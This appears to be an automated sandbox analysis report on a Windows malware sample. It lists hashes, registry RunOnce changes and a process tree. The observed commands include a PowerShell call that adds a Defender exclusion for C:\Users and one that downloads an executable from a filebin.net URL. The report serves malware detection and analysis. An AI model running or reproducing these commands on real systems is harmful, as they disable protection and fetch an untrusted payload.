Analysis
-
max time kernel
4294180s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20220310-en -
submitted
22/03/2022, 14:51
Static task
static1
Behavioral task
behavioral1
Sample
6239dfea99c25.exe
Resource
win7-20220310-en
0 signatures
0 seconds
General
-
Target
6239dfea99c25.exe
-
Size
154KB
-
MD5
b5946ff13e7698c7e2f26491885ddaab
-
SHA1
5a30f2c32c05cdf7ea86a916bb7b529c647e56b4
-
SHA256
b6814794481de92b96493819677c96320d500487b82fd6eb72018faba8a831eb
-
SHA512
4b296cc73916bf75bc1ab0feadf076b1794a88ba83663c1803e3342b14ff223b85f4d27b86c244088aa8f3eef309b1948f0db9ff71775f7d6e7759ca76b6dca7
Score
6/10
Malware Config
Signatures
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 6239dfea99c25.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce 6239dfea99c25.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1268 powershell.exe 1792 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1268 powershell.exe Token: SeDebugPrivilege 1792 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1748 wrote to memory of 536 1748 6239dfea99c25.exe 27 PID 1748 wrote to memory of 536 1748 6239dfea99c25.exe 27 PID 1748 wrote to memory of 536 1748 6239dfea99c25.exe 27 PID 536 wrote to memory of 1268 536 cmd.exe 29 PID 536 wrote to memory of 1268 536 cmd.exe 29 PID 536 wrote to memory of 1268 536 cmd.exe 29 PID 536 wrote to memory of 1792 536 cmd.exe 30 PID 536 wrote to memory of 1792 536 cmd.exe 30 PID 536 wrote to memory of 1792 536 cmd.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe"C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\system32\cmd.execmd /c bruhad.bat2⤵
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Add-MpPreference -ExclusionPath "C:\Users"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -uri https://filebin.net/ezig0gb1jw3em8r7/looad.exe -o looad.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-